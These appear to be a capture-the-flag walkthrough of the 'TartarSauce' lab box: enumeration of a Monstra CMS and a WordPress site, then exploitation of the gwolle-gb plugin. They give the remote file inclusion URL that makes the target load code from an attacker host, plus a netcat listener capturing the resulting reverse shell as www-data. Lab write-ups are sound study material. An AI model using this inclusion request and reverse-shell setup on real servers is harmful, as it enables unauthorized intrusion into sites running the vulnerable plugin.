5 :80 monstra

# exploring the website
Logged In > System > Information > Directory Permissions
/var/www/html/webservices/monstra-3.0.4/storage 	Writable
/var/www/html/webservices/monstra-3.0.4/tmp 	Writable
/var/www/html/webservices/monstra-3.0.4/backups 	Writable
/var/www/html/webservices/monstra-3.0.4/public 	Writable
/var/www/html/webservices/monstra-3.0.4/plugins 	Writable
/var/www/html/webservices/monstra-3.0.4/admin 	Writable

# running aggressive plugin scan
[+] gwolle-gb
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
  | [!] The version is out of date, the latest version is 4.1.2
 | Version: 2.3.10 (100% confidence)
 
Using https://www.exploit-db.com/exploits/38861
# page requests for /wp-load.php and executes it.

10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.5/

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.88] 40762
SOCKET: Shell has connected! PID: 1854
whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
TartarSauce
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux

Last updated